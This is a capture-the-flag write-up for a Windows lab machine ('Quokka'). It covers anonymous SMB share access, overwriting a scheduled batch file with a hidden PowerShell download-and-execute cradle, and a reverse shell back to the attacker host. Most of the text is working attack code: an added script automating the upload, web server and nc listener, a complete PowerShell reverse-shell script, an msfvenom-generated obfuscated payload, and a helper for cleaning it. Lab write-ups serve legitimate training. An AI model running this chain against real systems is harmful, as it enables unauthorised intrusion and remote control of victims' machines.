Lab: The Hackers Labs
URL: https://thehackerslabs.com/quokka/
OS: Windows
Topic: generating and invoking a PowerShell reverse shell
This machine is fairly simple, so the process is not written up in detail.
The first step is to log into SMB with a null account and recursively download every file from the share.
└─$ crackmapexec smb $IP -u 'null' -p '' --shares
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:WIN-VRU3GG3DPLJ) (signing:False) (SMBv1:True)
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ [+] WIN-VRU3GG3DPLJ\null:
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ [+] Enumerated shares
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ Share Permissions Remark
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ ----- ----------- ------
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ ADMIN$ Admin remota
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ C$ Recurso predeterminado
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ Compartido READ,WRITE
SMB 192.168.56.160 445 WIN-VRU3GG3DPLJ IPC$ IPC remota
└─$ smbclient //$IP/Compartido -U 'guest'
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
Among the downloaded files you will find two .bat batch files; the system runs both of them every minute. Since the Compartido share was listed above as READ,WRITE, it is enough to overwrite their contents with a PowerShell download cradle and put them back on the share.
The modified bat file:
└─$ cat mantenimiento.bat
@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.56.101/rev.ps1')"
exit
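The attacker-side part of this step, as an added example that is not from the original write-up: a small POSIX shell script that writes the replacement .bat, uploads it to the writable Compartido share over the same guest session used earlier, serves rev.ps1 with python3's http.server and waits for the callback with nc. It assumes smbclient, python3 and nc are installed and that rev.ps1 is already in the current directory; the hosts, port, share and file names are the ones from this write-up.

```shell
#!/bin/sh
# Added example, not from the original write-up: attacker-side helper for the
# bat-hijack step. Assumed: smbclient, python3 and nc are installed and rev.ps1
# sits in the current directory.

# Emit the batch file that the scheduled task will run.
# $1 = attacker IP hosting rev.ps1, $2 = script name on that server.
# CRLF line endings are used so cmd.exe parses the file cleanly.
make_bat() {
    ip=$1
    script=$2
    printf '%s\r\n' '@echo off' \
        "powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"iex(New-Object Net.WebClient).DownloadString('http://$ip/$script')\"" \
        'exit'
}

# Overwrite a file on the share with a guest (no password) session.
# $1 = target IP, $2 = share, $3 = local file, $4 = remote file name.
upload_bat() {
    smbclient "//$1/$2" -U guest -N -c "put $3 $4"
}

# Full chain: build, upload, serve, listen. $1 = target IP, $2 = LHOST, $3 = LPORT.
# Port 80 needs root; the task fires every minute, so the shell arrives within that window.
deploy() {
    target=$1
    lhost=$2
    lport=$3
    make_bat "$lhost" rev.ps1 > mantenimiento.bat
    upload_bat "$target" Compartido mantenimiento.bat mantenimiento.bat
    # Confirm the overwrite landed before waiting on the task
    smbclient "//$target/Compartido" -U guest -N -c "ls mantenimiento.bat"
    python3 -m http.server 80 >/dev/null 2>&1 &
    httpd=$!
    echo "[*] serving rev.ps1 on http://$lhost/rev.ps1, listening on $lport"
    nc -lvnp "$lport"
    kill "$httpd"
}

# Only run the chain when invoked with all three arguments, e.g.
#   sudo sh hijack.sh 192.168.56.160 192.168.56.101 1234
if [ "$#" -eq 3 ]; then
    deploy "$1" "$2" "$3"
fi
```

Run it as root (for port 80) with the target IP, your IP and the listener port; make_bat can also be called on its own to inspect the batch file before uploading it.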
rev.ps1 is the PowerShell-format shell we generate. There are several ways to produce it; the simplest is to paste in the classic minimal snippet:
# Connect back to the listener (attacker host and port)
$client = New-Object System.Net.Sockets.TCPClient("192.168.56.101", 1234)
$stream = $client.GetStream()
# Create one reader and one writer on the stream. A StreamReader buffers input, so
# creating a new one on every loop iteration would drop commands it had already read ahead.
$reader = New-Object System.IO.StreamReader($stream)
$writer = New-Object System.IO.StreamWriter($stream)
$writer.AutoFlush = $true
while ($true) {
    $command = $reader.ReadLine()
    # Stop when the listener closes the connection or sends "exit"
    if ($null -eq $command -or $command -eq "exit") { break }
    # Run the line through cmd.exe, merge stderr into stdout and flatten the
    # resulting array of lines into a single string before sending it back
    $output = cmd.exe /c $command 2>&1 | Out-String
    $writer.WriteLine($output)
}
$writer.Close()
$client.Close()
Alternatively, msfvenom can generate it, but pay attention to the output format.
└─$ msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 -f raw > rev.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 1816 bytes
The generated rev.ps1 cannot be used as-is. With -f raw this payload is emitted as the x86 launcher stub (the binary bytes at the start of the file) followed by the powershell.exe command line it launches, so delete everything before powershell.exe and keep only that single command line. That line is what the cradle fetches; iex on it just starts powershell.exe with those arguments as a child process.
└─$ cat rev.ps1
`1dP0R
8u};}$uXX$fӋI:I41
KXӋЉD$$[[aYZQ__Z]jPh1oջVh<|
uGrojSpowershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4s{2}ACOUOmcCA5VVXW/bNhR996+4M'+'LRFQmzC9tpiDZBinpoOAbLWqNLl'+'wTAQmrqOtdCkR1KxjcT/vaREfThO0FUPtsR7eXh4'+'7rnk{2}hfMZFLAX2j6NzhnPENhoPPYAfsEGwbn8Bk3/S/zf5EZ6F/v1viZrtAOGmLz4yK/SibfNH7EBc25iRWmNpJRri1EYFSOddZEye2OPMuw462RKrez7ywqimu5QWW/LDso4hOq6Cos36eJUZm4mwWxXK2oSHuHo4nmT{2}pn{1}x/lRnBJ02{2}08phKMtQavAArmeYcHcE/w{1}jKlGwBYbUM9P'+'E/6M4zkXaj{2}ljOK+byTBsUqOzkabKz7yviVEsku0ejyTVbX/mM2XD025vjiUQbqoxb169cRH2Jzlt5Y8ZwbSx{1}WY6wpLJ/ja7CB1QajxnX0'+'K2Sv8Q8nviFusP3{2}zJ89zt5+44MB8Nuz23Er94pFdRG{2}V05uiU6sU5LijFLsyFYFqjk58zS9fVosdOaJxXYKwSR5SozO5JUqaFfvxcsrKuwFz4G1xZ9D32qYXow5yuupMEYlckWGaMG/6E8S6mzXkw5n1N2P4uiF+iQcW6Wzrdu0li/Jk0{1}cs57XcP1cNT1fNpwtU7NPttCTuc7{1}9PZLHD/zpADQkYD+zz98jjYe61RpFU4nBrcGoKCydS5/exsnMSXl5HT/0+XE3ZvrG3lRsPENVayRM5B5ULYbLDq5NpatwunEKB4OHNfwjX+qR2zhaoDTK7WuWmCtyKW653K7pYGwjiCvzOmpJYLA7FUa6kKQQmM3W{2}uSYNCi/2AKbkVt8Kb0stBb'+'mxpM'+'Gw21hv0m{1}9y'+'heLOLNs2qlq6baQjH/2cStPTG'+'VxZSCeLPw5{2}zfPnuVazPkl1QdnSci5B{2}RP1cdNkNbTdEx6c0hGpdlseaBVS9HQpHuQ99i+2a6uttnrXKPu2pTbLjGMYBlnhun{2}'+'TX5GmYemxH{1}x6EB'+'ywj6AvEAZHkl44/TC9tlq+dmH4NnUppND4wmveoNhmo45KC82fFsXuKlEhyKJn1bS96Yp5tG/oVwdfCT768OsQnuBLbvolKnjzHECNoBCkAj6Fk0kCJ/a'+'/0P9KssLDEZlQs3TRD3DS{1}GwdkQCVkmo6mB0s1mJdxAnjSFUYvcT{1}vP1hW23bOTbw//JvA/NDx7YNe+TXas4nnutlfRf6{1}8cf7TG'+'XGv1+inasbqi2YZprKzFyXd1V/tc6s77m69r5++o7sN+WFKw{2}AAA{0}')-f'=','g','I')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
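Carving that command line out of the raw output by hand is error-prone, so here is an added example (not part of the original write-up) that does it with grep and then checks the result before it is served: one line, starting with powershell.exe, still carrying the FromBase64String blob, and no non-printable bytes left over. The input file used in the demo is constructed here, a few arbitrary bytes standing in for the stub plus a shortened command line with a dummy base64 blob, so the script runs offline; on the real file call strip_stub rev.ps1 > rev_clean.ps1.

```shell
#!/bin/sh
# Added example, not part of the original write-up: carve the powershell.exe command
# line out of msfvenom's raw output and sanity-check it. The demo input is constructed
# below (not real shellcode, not a real payload).

# Keep only the bytes from "powershell.exe " to the end of that line. -a makes grep treat
# the binary file as text, -o prints just the match, so every stub byte before it is
# dropped; LC_ALL=C stops the locale from choking on the stub's invalid UTF-8. Trailing
# NUL or CR bytes, if any, are removed as well.
strip_stub() {
    LC_ALL=C grep -a -o 'powershell\.exe .*' "$1" | head -n 1 | tr -d '\000\r'
}

# Verify the carved result is a single clean one-liner: exactly one line, starts with
# powershell.exe, still carries the FromBase64String blob, and contains nothing outside
# printable ASCII (a leftover stub byte would break iex on the target).
check_script() {
    f=$1
    [ "$(wc -l < "$f" | tr -d ' ')" -eq 1 ] || { echo "not a single line" >&2; return 1; }
    grep -q '^powershell\.exe ' "$f" || { echo "does not start with powershell.exe" >&2; return 1; }
    grep -q 'FromBase64String' "$f" || { echo "base64 payload missing" >&2; return 1; }
    if LC_ALL=C grep -q '[^ -~]' "$f"; then echo "non-printable bytes remain" >&2; return 1; fi
    return 0
}

# Constructed stand-in for the raw output: nine arbitrary bytes in place of the stub,
# then the command line with no trailing newline, the same shape as the real file.
sample_cmd="powershell.exe -nop -w hidden -noni -ep bypass \"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAAAAAAAA{0}')-f'='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))\""
make_sample() {
    printf '\374\350\202\000\000\000\140\211\345' > "$1"
    printf '%s' "$sample_cmd" >> "$1"
}

# Demo: build the sample, carve it, check it.
demo() {
    raw=$(mktemp)
    make_sample "$raw"
    strip_stub "$raw" > "$raw.ps1"
    if check_script "$raw.ps1"; then
        echo "[+] clean one-liner, $(wc -c < "$raw.ps1" | tr -d ' ') bytes"
    fi
    rm -f "$raw" "$raw.ps1"
}
demo
```

The check is worth keeping even when carving by hand in an editor: an invisible stub byte left in front of powershell.exe is enough to make the cradle's iex fail silently on the target.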